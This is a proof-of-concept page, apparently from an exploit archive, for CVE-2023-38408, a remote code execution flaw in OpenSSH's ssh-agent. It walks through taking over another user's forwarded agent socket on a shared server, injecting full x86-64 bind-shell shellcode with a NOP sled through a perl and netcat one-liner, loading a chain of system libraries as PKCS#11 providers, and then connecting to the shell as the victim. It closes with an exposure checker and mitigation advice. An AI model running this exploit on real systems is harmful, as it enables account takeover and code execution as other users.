POC details: e9c411df23c9b009c704a8e3a15869269564609f

Source
Related vulnerability
Title: OpenSSH code issue vulnerability (CVE-2023-38408)
Description: OpenSSH (OpenBSD Secure Shell) is a set of connectivity tools from the Canadian OpenBSD project for securely accessing remote computers. It is an open-source implementation of the SSH protocol that encrypts all traffic and so effectively prevents eavesdropping, connection hijacking and other network-level attacks. OpenSSH versions before 9.3p2 contain a security vulnerability in the PKCS#11 functionality of ssh-agent. An attacker can exploit it to execute code remotely.
Description
Takeover Account OpenSSH
Introduction
# OpenSSH Vulnerability - CVE-2023-38408 :books:

### Introduction

CVE-2023-38408 affects OpenSSH before version 9.3p2. The PKCS#11 support in ssh-agent used an insufficiently trustworthy search path: on request over the agent socket, the agent would dlopen() libraries from the client's own /usr/lib, and the code in /usr/lib is not necessarily safe to load into ssh-agent (library constructors and destructors run on load and unload, with side effects the agent never intended). If an agent is forwarded to an attacker-controlled system, the attacker can send a chosen sequence of `SSH_AGENTC_ADD_SMARTCARD_KEY` requests through the forwarded socket, load those libraries in the agent, and reach arbitrary code execution on the client host with the privileges of the user running ssh-agent. Note that the attacker does not need to write anything to the client's filesystem: the abused libraries are ones already installed there, and control of the server side of the forwarded agent socket is enough.

**The figure below summarises the steps, from reconnaissance to compromising Alice's account.**

<p align="center">
  <img width="700" height="400" src="./img/poc.JPG">
</p>

* Step 1 - The **attacker** logs in to the server over SSH.
* Step 2 - The user **Alice** is also logged in to the same server over SSH, with agent forwarding enabled, so her forwarded agent socket exists on the server.
* Step 3 - The attacker writes a bind-shell shellcode into the forwarded agent's memory by sending it through the socket inside an agent protocol request.
* Step 4 - A sequence of PKCS#11 provider loads then exploits the vulnerability: when the chain fires, the shellcode runs with Alice's privileges and leaves a shell listening on TCP port 31337. The listener is opened by the agent process, so it is reachable on the host where Alice's ssh-agent actually runs; in this write-up's setup that is reachable from the attacker's session as `localhost`.
* Step 5 - Still from the attacker's own session, the attacker connects to that listener with `nc localhost 31337` and runs commands as Alice.

## Building the PoC
As described above, this PoC uses two users connected to the same server over SSH. The steps below assume both users already have SSH access to the server and that Alice's session forwards her agent.

1. Locate Alice's forwarded agent socket on the server and point `SSH_AUTH_SOCK` at it (the socket lives under `/tmp/ssh-XXXXXXXXXX/` and the number after `agent.` is a PID assigned by sshd, not something you choose). Then load `/usr/lib/systemd/boot/efi/linuxx64.elf.stub` (the systemd UEFI boot stub) into the agent as a PKCS#11 provider with `ssh-add -s`; this is the first library in the chain.
```
# list the forwarded agent sockets present on the server and pick the one
# belonging to the target (Alice's) session
echo /tmp/ssh-*/agent.*
export SSH_AUTH_SOCK=/tmp/ssh-NqLP6il36s/agent.3452
# first stage of the chain: load the EFI boot stub as a "PKCS#11 provider"
ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub
```
<p align="center">
  <img width="1000" height="200" src="./img/1.JPG">
</p>

2. Next, still in the attacker's session, push the shellcode into the agent's memory through the socket. The perl one-liner frames a single `SSH_AGENTC_ADD_SMARTCARD_KEY` request (type 0x14): a total length of 0x27bf = 10175 bytes, the provider path `/usr/lib/modules` (length 0x10 = 16), and a PIN string of 0x27a6 = 10150 bytes made of a 10000-byte NOP sled followed by the 150-byte shellcode. The agent copies the PIN into its heap, which is what places the sled and payload in memory. The shellcode itself is an x86-64 bind shell: it creates a TCP socket, binds port 31337 (0x7a69), accepts one connection, dup2()s it onto stdin, stdout and stderr, and execve()s `/bin/sh`.

```
# x86-64 bind shell: listens on TCP 31337 (0x7a69), then execve("/bin/sh")
SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
# SSH_AGENTC_ADD_SMARTCARD_KEY (0x14): provider "/usr/lib/modules", PIN = 10000 NOPs + shellcode
(perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$SHELLCODE") | nc -U "$SSH_AUTH_SOCK"
```
<p align="center">
  <img width="1000" height="100" src="./img/2.JPG">
</p>

Finally, press Ctrl-C to end the netcat session once the request has been sent; the sled and shellcode are now held in the agent's memory.
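To make the framing of that request explicit, here is an added Python example (not part of the original PoC) that builds and parses an `SSH_AGENTC_ADD_SMARTCARD_KEY` message the way the agent reads it from `SSH_AUTH_SOCK`. It reproduces the exact header bytes the perl one-liner hard-codes, using a constructed 150-byte placeholder payload of the same length as the real shellcode; the `send_to_agent` helper is the Python equivalent of `nc -U` and is not called automatically.

```python
import socket
import struct

# Message type from the SSH agent protocol: ADD_SMARTCARD_KEY
SSH_AGENTC_ADD_SMARTCARD_KEY = 20


def ssh_string(data):
    """Encode an SSH 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def build_add_smartcard_key(provider_path, pin):
    """Frame an ADD_SMARTCARD_KEY request as the agent expects it on the socket:
    uint32 total length, byte type, string provider, string pin.
    No key constraints are appended (the PoC sends none)."""
    body = bytes([SSH_AGENTC_ADD_SMARTCARD_KEY]) + ssh_string(provider_path) + ssh_string(pin)
    return struct.pack(">I", len(body)) + body


def parse_agent_message(msg):
    """Inverse of the above: return (type, [string fields]) and verify framing,
    raising ValueError on a short or inconsistent message."""
    if len(msg) < 5:
        raise ValueError("short message")
    (total,) = struct.unpack(">I", msg[:4])
    if total != len(msg) - 4:
        raise ValueError(f"length field {total} != payload {len(msg) - 4}")
    mtype = msg[4]
    fields, off = [], 5
    while off < len(msg):
        (n,) = struct.unpack(">I", msg[off:off + 4])
        off += 4
        if off + n > len(msg):
            raise ValueError("string runs past end of message")
        fields.append(msg[off:off + n])
        off += n
    return mtype, fields


# Values taken from the PoC: provider path and a 10000-byte NOP sled.
PROVIDER = b"/usr/lib/modules"
NOP_SLED = b"\x90" * 10000
# Constructed placeholder payload: 150 bytes of int3, the same length as the
# PoC's bind-shell shellcode, so the framing matches byte for byte without
# embedding a working payload here.
PLACEHOLDER_SHELLCODE = b"\xcc" * 150

# The fixed header the perl one-liner hard-codes, for comparison.
PERL_HEADER = b"\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6"


def poc_message():
    """The PoC request: sled + payload delivered as the PIN string."""
    return build_add_smartcard_key(PROVIDER, NOP_SLED + PLACEHOLDER_SHELLCODE)


def header_matches_poc():
    """True if our framing reproduces the perl one-liner's header bytes."""
    return poc_message().startswith(PERL_HEADER)


def send_to_agent(sock_path, msg):
    """Deliver one framed request to an agent socket (what `nc -U` does in the
    PoC) and return the agent's raw reply. Only use against an agent you own."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect(sock_path)
        s.sendall(msg)
        return s.recv(4096)


if __name__ == "__main__":
    msg = poc_message()
    mtype, (provider, pin) = parse_agent_message(msg)
    print(f"type={mtype} provider={provider!r} pin_len={len(pin)} total={len(msg)}")
    print("matches perl header:", header_matches_poc())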

3. Load three more libraries as PKCS#11 providers with `ssh-add -s`: ***libttcn3-rt2-dynamic.so, libKF5SonnetUi.so.5.92.0 and libns3.35-wave.so.0.0.0***. These are ordinary libraries that happen to be installed under /usr/lib on the host running the agent; their constructors and destructors have the side effects the chain needs, in particular registering a handler for the segmentation-fault signal (SIGSEGV) and then causing the fault that makes the handler run.

> [!NOTE]
> **Triggering SIGSEGV** :speech_balloon:<br>
> SIGSEGV is the signal delivered to a process when it makes an invalid memory reference (a segmentation fault). If the process has registered a handler for it, the kernel invokes that handler instead of terminating the process. The chain relies on this: a handler installed by one of the loaded libraries runs on the fault, and memory has been arranged so that the handler transfers execution into the NOP sled, which slides into the injected shellcode.

```
ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
# press Enter at the passphrase prompt
ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
# press Enter at the passphrase prompt
ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0
# press Enter at the passphrase prompt
```
<p align="center">
  <img width="1000" height="200" src="./img/3.JPG">
</p>

4. When the last load fires the chain, the shellcode runs with Alice's privileges and leaves a shell listening on TCP port 31337 on the host running her agent. Connecting to it from the attacker's session gives command execution as Alice. :fire:

```
# connect to the bind shell left listening by the shellcode; commands run as Alice
nc localhost 31337
```
<p align="center">
  <img width="1000" height="200" src="./img/4.JPG">
</p>

## Does CVE-2023-38408 affect me :question:

You are exposed when all of the following hold: the client runs a portable OpenSSH older than 9.3p2, ssh-agent is in use, and the agent is forwarded (`ForwardAgent yes` in ssh_config, or `ssh -A`) to a host an attacker controls or has already compromised. The malicious host needs nothing beyond access to the forwarded socket; the libraries it abuses are the ones already installed under /usr/lib on the client. To mitigate: upgrade to OpenSSH 9.3p2 or later; do not forward the agent to hosts you do not trust (use `ProxyJump` for multi-hop access instead); and, as the 9.3p2 release notes recommend, start ssh-agent with an empty PKCS#11/FIDO allowlist (`ssh-agent -P ''`) or an allowlist that names only the provider libraries you actually use.
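As an added exposure check (not part of the original PoC), the following Python script puts the three conditions above into code: it parses the `ssh -V` banner and compares it with 9.3p2, looks for an enabling `ForwardAgent` line in a client ssh_config, and, inside an SSH session, recognises a forwarded agent by the `/tmp/ssh-*/agent.<pid>` socket path that step 1 of the PoC relies on. The banner regex, the treatment of banners without a `p` suffix as out of scope, and the socket path pattern (default Linux sshd layout) are assumptions of this example.

```python
import os
import re
import subprocess

# First portable release carrying the CVE-2023-38408 fix: (major, minor, p-level)
FIXED_VERSION = (9, 3, 2)

# Assumed banner shape, e.g. "OpenSSH_9.3p1 Ubuntu-1ubuntu3, OpenSSL 3.0.10 1 Aug 2023"
_BANNER_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:p(\d+))?")


def parse_openssh_version(banner):
    """Return (major, minor, p_level, is_portable) from an `ssh -V` banner.
    Banners without a 'p' suffix are OpenBSD-native builds: p_level is then 0
    and is_portable is False. Returns None for an unrecognised banner."""
    m = _BANNER_RE.search(banner)
    if not m:
        return None
    major, minor, p = m.groups()
    return int(major), int(minor), int(p) if p is not None else 0, p is not None


def version_is_vulnerable(banner):
    """True for a portable OpenSSH older than 9.3p2, False for 9.3p2 or newer,
    None when the banner alone cannot decide (unrecognised, or an OpenBSD-native
    build whose patch state the banner does not reveal)."""
    v = parse_openssh_version(banner)
    if v is None or not v[3]:
        return None
    return v[:3] < FIXED_VERSION


def local_ssh_banner():
    """Run `ssh -V` on this host; the banner is printed to stderr."""
    r = subprocess.run(["ssh", "-V"], capture_output=True, text=True)
    return (r.stderr or r.stdout).strip()


def forward_agent_enabled(ssh_config_text):
    """Client side: True if any uncommented ForwardAgent line enables forwarding.
    ssh_config accepts 'yes', 'no', or an explicit socket path / environment
    variable name, so anything other than 'no' counts as enabled. Both
    'Key value' and 'Key=value' spellings are accepted."""
    for raw in ssh_config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2 and parts[0].lower() == "forwardagent":
            if parts[1].strip().lower() != "no":
                return True
    return False


def forwarded_agent_in_session(env=None):
    """Server-side heuristic (assumption: default Linux sshd layout): inside an
    SSH session a forwarded agent shows up as SSH_AUTH_SOCK pointing at
    /tmp/ssh-XXXXXXXXXX/agent.<pid>, the path the PoC's step 1 lists."""
    env = os.environ if env is None else env
    sock = env.get("SSH_AUTH_SOCK", "")
    in_ssh_session = "SSH_CONNECTION" in env
    return in_ssh_session and re.fullmatch(r"/tmp/ssh-[^/]+/agent\.\d+", sock) is not None


def assess(banner, ssh_config_text, env=None):
    """Combine the three checks into one verdict dictionary."""
    return {
        "vulnerable_version": version_is_vulnerable(banner),
        "forward_agent_configured": forward_agent_enabled(ssh_config_text),
        "forwarded_agent_present": forwarded_agent_in_session(env),
    }


if __name__ == "__main__":
    cfg = ""
    path = os.path.expanduser("~/.ssh/config")
    if os.path.exists(path):
        with open(path) as f:
            cfg = f.read()
    print(assess(local_ssh_banner(), cfg))
```

Run it on the client to see whether the installed OpenSSH is old enough and whether your config forwards the agent; run it inside a session on a server to see whether a forwarded socket is present there. A `vulnerable_version` of `None` means the banner did not settle the question and the package's own changelog should be consulted.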
File snapshot

```
[4.0K] /data/pocs/e9c411df23c9b009c704a8e3a15869269564609f
├── [4.0K] img
│   ├── [ 31K] 1.JPG
│   ├── [ 52K] 2.JPG
│   ├── [ 39K] 3.JPG
│   ├── [ 16K] 4.JPG
│   └── [ 49K] poc.JPG
└── [4.8K] README.md

1 directory, 6 files
```